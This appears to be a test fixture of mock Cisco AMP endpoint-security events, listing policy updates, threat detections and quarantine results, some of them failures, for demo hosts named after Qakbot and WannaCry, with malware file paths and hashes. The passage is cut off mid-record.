+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662854721208000,"timestamp":1610651431,"timestamp_nanoseconds":856000000,"date":"2021-01-14T19:10:31+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":233000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":396000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":927000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"igvj$vN.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"6951045.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"99fffe78e0cbd7b508eed13a8633903dd89ed5f1","md5":"dc41e47ebba549ec5e616ed9e88a0376"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 